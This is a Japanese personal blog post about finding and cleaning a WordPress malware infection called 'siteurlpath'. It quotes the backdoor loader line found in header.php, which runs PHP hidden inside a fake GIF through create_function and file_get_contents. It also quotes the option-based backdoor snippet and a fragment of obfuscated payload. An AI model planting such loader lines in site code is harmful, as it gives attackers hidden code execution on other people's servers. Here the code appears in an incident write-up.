だぶだぶノート

blinkhash.jsを1.2.1にバージョンアップしました。
バグフィクス版です。

なんかmenu_riight.gifの中身がPHPコードになってた。
これが本体らしい。

調べてみたらfile_get_conとか出てきたけど、file_get_contens・・・？
解析がうまくいかない。。。

こんな感じで難読化してあるので、
"7U1koQxad+3NImatQdX5OxDmRlzdKzb3erpXETb+lEV++ixO4Cv1lv+l"
難読化アルゴリズムの勉強にはなるかなあ。

使う場面ないけど。

Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots) | Sucuri

header.phpに以下の記述があることを発見。

<?php $wp__theme_icon=@create_function('',@file_get_contents('/themes/dabsky/images/menu-riight.gif'));$wp__theme_icon(); ?>

しかしfunctions.phpには記述を確認できず。

if(!isset($siteurlpath)&& @get_option(‘siteurlpath’)){
$siteurlpath=create_function(”,(get_option(‘siteurlpath’)));
$siteurlpath();
}

バックアップファイルを見てみると、2011年1月1日のファイルには感染を確認できず。
次のバックアップが2012年3月13日（この間、テンプレートファイルを更新していないため）で、感染を確認。
しかしfunctions.phpにこの記述を確認できず。

上記サイトの説明によると、指定されたファイル（menu_riight.gif）を表示する時に、画像ファイルではなくウイルスコードを送出するらしい。
しかし幸運にも、menu_riight.gifはファイルを置いてあるだけで使ってなかったため、感染拡大は防げていた模様（？）

Cleaning up the database
Run the following query to see if your database is infected:
> select * from wp_options where option_name = ‘siteurlpath’;

に従い、データベースを検索したが、見つからず。
データベースの感染の疑いはなし、と。

WordPressに感染する、という情報も見つかった。
たしかにMacを購入してしばらくはアンチウイルスを入れなかった時期があるけど、やはりその間に感染したんだろうか。。。
感染源、マルウェア本体が見つからないまま、この件は終了。。。

このブログのGoogleキャッシュを見てみると。

なんだこれはorz

広告が入るのはGoogle Cacheを見たときだけらしい。

使用中のプラグインは

• Akismet
• Like http://blog.bottomlessinc.com
• WPMultbytePatch
• WPTouch http://wordpress.org/extend/plugins/wptouch/

怪しそうなのはWPTouchだけなんだけど有名プラグインだし、、、

原因わかる人が居たら、情報お願いします。

—————————
追記編集

siteurlpathというマルウェアのようです。
とりあえず、wp_theme_iconというキーワードで検索してみて、対処法を調べてみます。

—————————
http://okwave.jp/qa/q7447215.htmlからの訪問者さんへ
この件は解決しました。
次の投稿で結果報告があります。

なるほどねー。
いや確かに面白いんだけど、どうもハマりきれない所があって、言われて気づいたっていうか。
パロディーはパロディーとしての楽しさ、面白さはあるけど、メインにはなれないっていうのかなぁ。
そんな感じ。 Read_On

blinkhash更新しました。
最新版はバージョン1.2です。

ブラウザの戻る・進むボタンに対応しました。